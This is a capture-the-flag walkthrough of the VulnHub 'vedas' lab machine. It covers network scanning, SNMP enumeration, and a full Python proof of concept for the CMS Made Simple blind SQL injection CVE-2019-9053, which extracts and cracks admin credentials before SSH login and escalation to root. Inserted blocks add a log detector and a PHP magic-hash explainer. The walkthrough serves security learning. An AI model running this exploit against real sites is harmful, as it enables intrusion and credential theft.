Penetration Testing - CTF - VulnHub - vedas

Posted by 山東-呵呵 on 2020-12-27

Penetration testing study - CTF

A walkthrough of the vedas box

This box is fairly easy and is written up purely for learning. Beginners can learn from it; experienced players can skip it.

Approach:

1. Host discovery
2. Service scanning
3. Local file inclusion
4. Reverse connection
5. Passwordless SSH login

Box download: https://download.vulnhub.com/ha/vedas.ova

You can also search for vedas on www.vulnhub.com to download the box.

Host discovery on the network

msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 10.10.10.1 appears to be up (VMware, Inc.).
[+] 10.10.10.2 appears to be up (VMware, Inc.).
[+] 10.10.10.128 appears to be up (VMware, Inc.).
[+] 10.10.10.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Service discovery

[*] exec: nmap -sV -p- 10.10.10.128

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-26 11:58 EST
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.00073s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:B4:75:F2 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
msf6 auxiliary(scanner/discovery/udp_sweep) > run

[*] Sending 13 probes to 10.10.10.128->10.10.10.128 (1 hosts)
[*] Discovered SNMP on 10.10.10.128:161 (Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

For UDP discovery I used msf's udp_sweep here, because nmap's UDP scan is very slow for a reason I don't understand; a few articles found on Baidu didn't solve it either (if anyone knows, please leave a comment).

Use snmp_enum to read the SNMP information

msf6 auxiliary(scanner/snmp/snmp_enum) > run

[+] 10.10.10.128, Connected.

[*] System information:

Host IP                       : 10.10.10.128
Hostname                      : ubuntu
Description                   : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Contact                       : Way to Root:1 (0e462097431)
Location                      : Rig Veda: {0e87105d070afcb11c7264cc13f2e86b}
Uptime snmp                   : 00:39:24.47
Uptime system                 : 00:39:12.40
System date                   : 2020-12-26 09:29:30.0


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

First flag found

Open the IP in a browser to look at the site; a dirb directory scan turns up only static pages, as shown below

Build a wordlist with cewl and run dirb again

root@kali:~# dirb http://10.10.10.128 /root/dic.txt 

START_TIME: Sat Dec 26 12:33:57 2020
URL_BASE: http://10.10.10.128/
WORDLIST_FILES: /root/dic.txt

==> DIRECTORY: http://10.10.10.128/images/                                                                                               
==> DIRECTORY: http://10.10.10.128/Kashyapa/                                                                                             

A new directory is found; visit http://10.10.10.128/Kashyapa/

It is clearly a CMSMS site, which can also be confirmed with whatweb

root@kali:~# whatweb http://10.10.10.128/Kashyapa/
http://10.10.10.128/Kashyapa/ [200 OK] Apache[2.4.29], CMS-Made-Simple[2.2.8], Cookies[CMSSESSIDcb079ad4d4cb], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.128], JQuery[1.11.1], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.], Script[text/javascript], Title[Home - Vedas]

Searching for vulnerabilities in this CMS version turns up CVE-2019-9053

Get the PoC code

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib

url_vuln = 'http://10.10.10.128/Kashyapa/moduleinterface.php?mact=News,m1_,default,0&m1_idlist='
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'

flag = True
password = ""
sleep_time = 1
username = ""
result = ""
email = ""
salt = ""

def get_salt():
    global flag
    global salt
    global result
    salt = ""
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    result += '\n[+] Salt for password found: ' + salt
	
def get_username(userid):
    global flag
    global username
    global result
    username = ""
    ord_username = ""
    ord_username_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_username = username + dictionary[i]
            ord_username_temp = ord_username + hex(ord(dictionary[i]))[2:]
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+username+like+0x" + ord_username_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            username = temp_username
            ord_username = ord_username_temp
    result += '\n[+] Username found: ' + username
    flag = True
    if username:
        return True
    else:
        return False

def get_email(userid):
    global flag
    global email
    global result
    email = ""
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    result += '\n[+] Email found: ' + email
    flag = True
	
def get_password(userid):
    global flag
    global password
    global result
    password = ""
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
            url = url_vuln + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= sleep_time:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    result += '\n[+] Password found: ' + password

def crack_password():
    global password
    global result
    global salt
    dict = open("/root/dic.txt") # change to the path of the generated wordlist
    for line in dict.readlines():
        line = line.replace("\n", "")
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            result += "\n[+] Password cracked: " + line
            break
    dict.close()

def beautify_print():
    global result
    cprint(result,'green', attrs=['bold'])

def main():
    global result
    for i in range(1, 10):
        get_salt()
        user_exist = get_username(i)
        if user_exist:
            get_email(i)
            get_password(i)
            crack_password()
            beautify_print()
            result = ""
        else:
            break

main()

Run the PoC

root@kali:~/Desktop# python2 poc.py

[+] Salt for password found: 65bd8602d290b16d                                                                                             
[+] Username found: atri                                                                                                                  
[+] Email found: abcd@gmail.com                                                                                                           
[+] Password found: 49ba135760e8265758ae48ef5c7338c7                                                                                      
[+] Password cracked: anasuya   
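As an added defender-side example (not part of the original post and not part of the PoC), the following Python script scans Apache access-log lines for the request shape this PoC produces: a request to `moduleinterface.php` whose `m1_idlist` parameter is not a plain list of numeric ids and carries SQL syntax such as `sleep(` or hex literals. The sample log lines are constructed for the example, and the function name `find_cmsms_idlist_injection` is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log sample (not taken from the original page):
# line 1 is a normal News-module request, lines 2 and 3 mirror the shape of
# the time-based blind injection requests the PoC sends, line 4 is unrelated.
SAMPLE_LOG = """\
10.10.10.200 - - [26/Dec/2020:12:40:01 -0500] "GET /Kashyapa/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=1 HTTP/1.1" 200 5123
10.10.10.200 - - [26/Dec/2020:12:40:02 -0500] "GET /Kashyapa/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=0,1,2))+and+(select+sleep(1)+from+cms_siteprefs+where+sitepref_value+like+0x3625+and+sitepref_name+like+0x736974656d61736b)+--+ HTTP/1.1" 200 5123
10.10.10.200 - - [26/Dec/2020:12:40:04 -0500] "GET /Kashyapa/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=0,1,2))+and+(select+sleep(1)+from+cms_users+where+username+like+0x6125+and+user_id%3d1)+--+ HTTP/1.1" 200 5123
10.10.10.200 - - [26/Dec/2020:12:40:05 -0500] "GET /Kashyapa/index.php HTTP/1.1" 200 2048
"""

# Common Log Format: client ident user [timestamp] "METHOD target HTTP/x.y" status bytes
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# A legitimate m1_idlist is a comma-separated list of integer article ids.
CLEAN_IDLIST_RE = re.compile(r'^\d+(,\d+)*$')
# Tokens that mark the PoC's payload shape: keywords, sleep(), hex literals, comment.
SQLI_HINT_RE = re.compile(r'sleep\s*\(|\bselect\b|\bunion\b|0x[0-9a-f]{2,}|--', re.IGNORECASE)


def find_cmsms_idlist_injection(log_text):
    """Return one finding per log line whose m1_idlist is not a plain id list."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/moduleinterface.php"):
            continue
        # parse_qs undoes the '+' and %xx encoding the PoC relies on,
        # so the keyword check runs on the decoded value.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("m1_idlist", []):
            if CLEAN_IDLIST_RE.match(value):
                continue
            if SQLI_HINT_RE.search(value):
                reason = "SQL syntax in m1_idlist"
            else:
                reason = "non-numeric m1_idlist"
            findings.append({
                "line": line_no,
                "client": m.group("client"),
                "timestamp": m.group("ts"),
                "reason": reason,
                "value": value[:80],
            })
    return findings


if __name__ == "__main__":
    for f in find_cmsms_idlist_injection(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} {f['reason']}: {f['value']}")
```

The rule is deliberately tight: since the News module only ever expects integer ids in `m1_idlist`, anything else is worth an alert, and the decoded value is checked rather than the raw URL so that `+` and `%3d` encoding cannot hide the keywords. In practice the same check can be fed from `tail -f` on the access log or from a SIEM parser.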

Log in to the CMSMS admin panel with that account: http://10.10.10.128/Kashyapa/admin/login.php

Browsing around yields the second flag

Yagur Veda: {81b44a402a34a850dfcf1e277a18234d}

Way to Root:2 (906509019)

SSH is open, so try logging in as atri with the information obtained

root@kali:~/Desktop# ssh atri@10.10.10.128
atri@10.10.10.128's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

New release '20.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Dec 25 21:49:53 2020 from 10.10.10.200
atri@ubuntu:~$ 

Login successful

Look around the local directories

atri@ubuntu:/$ ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  swapfile  tmp  var      vmlinuz.old
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   srv   sys       usr  vmlinuz
atri@ubuntu:/$ cd opt
atri@ubuntu:/opt$ ls
test
atri@ubuntu:/opt$ cd test
atri@ubuntu:/opt/test$ ls
index.html
atri@ubuntu:/opt/test$ cat index.html 
Sama Veda: {c9a9aeb104157fb92f781714d010099c}
Way to Root:3 (562988736854)
atri@ubuntu:/opt/test$ 

Third flag found

The three flags share a common element: concatenating the Way to Root strings gives 0e462097431906509019562988736854, and looking this hash up yields the password 240610708
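As an added example (not from the original post), the following Python snippet reproduces the "look up the hash" step offline: it joins the three Way to Root fragments, confirms that the result is md5("240610708") by checking a small candidate list, and, going one step beyond the post, shows why this particular digest is well known: it is `0e` followed only by decimal digits, so PHP's loose `==` reads it as the number zero. The candidate list and the function names are assumptions made for the example.

```python
import hashlib

# The three "Way to Root" fragments exactly as they appear in the flags above.
WAY_TO_ROOT_FRAGMENTS = ["0e462097431", "906509019", "562988736854"]

# Constructed candidate list standing in for the online hash lookup.
CANDIDATES = ["anasuya", "vedas", "atri", "240610708"]


def join_fragments(fragments):
    """Concatenate the fragments in flag order, as the walkthrough does."""
    return "".join(fragments)


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def recover_password(target_hex, candidates):
    """Offline equivalent of 'look up the hash': return the candidate whose md5 matches."""
    for candidate in candidates:
        if md5_hex(candidate) == target_hex:
            return candidate
    return None


def is_php_magic_md5(hex_digest):
    """True when the digest is '0e' followed only by decimal digits.

    PHP's loose comparison (==) reads such a string as scientific notation,
    0 * 10^N, so it compares equal to "0" and to every other "0e..." digest.
    That is why hashes must be compared with === or hash_equals(), and why
    md5("240610708") is the textbook example of such a "magic hash".
    """
    return (len(hex_digest) == 32
            and hex_digest.startswith("0e")
            and hex_digest[2:].isdigit())


if __name__ == "__main__":
    joined = join_fragments(WAY_TO_ROOT_FRAGMENTS)
    print("joined fragments :", joined)
    print("recovered value  :", recover_password(joined, CANDIDATES))
    print("php magic hash?  :", is_php_magic_md5(joined))
```

The practical lesson for code review is the last function: a login or token check written as `if ($stored == md5($input))` in PHP accepts any input whose digest also starts with `0e` and digits, so hash comparisons belong in `hash_equals()` (or `===`), never in `==`.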

Check the other users under the home directory and try logging in with that password

atri@ubuntu:/home$ ls
atri  vedas
atri@ubuntu:/home$ su vedas
Password: 
406su: Authentication failure
atri@ubuntu:/home$ 40610708
40610708: command not found
atri@ubuntu:/home$ su vedas
Password: 
vedas@ubuntu:/home$ sudo bash
[sudo] password for vedas: 
root@ubuntu:/home# ls
atri  vedas
root@ubuntu:/home# cd /root/
root@ubuntu:/root# ls
final.txt
root@ubuntu:/root# cat final.txt 

 ▄█    █▄     ▄████████ ████████▄     ▄████████    ▄████████ 
███    ███   ███    ███ ███   ▀███   ███    ███   ███    ███ 
███    ███   ███    █▀  ███    ███   ███    ███   ███    █▀  
███    ███  ▄███▄▄▄     ███    ███   ███    ███   ███        
███    ███ ▀▀███▀▀▀     ███    ███ ▀███████████ ▀███████████ 
███    ███   ███    █▄  ███    ███   ███    ███          ███ 
███    ███   ███    ███ ███   ▄███   ███    ███    ▄█    ███ 
 ▀██████▀    ██████████ ████████▀    ███    █▀   ▄████████▀  
                                                             
                                                                      
Atharva Veda: {c08cddc7f3bac6f00c00408c6d2274dc}

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/hackinarticles

Vishva Vaghela   : www.linkedin.com/in/vishvavaghela
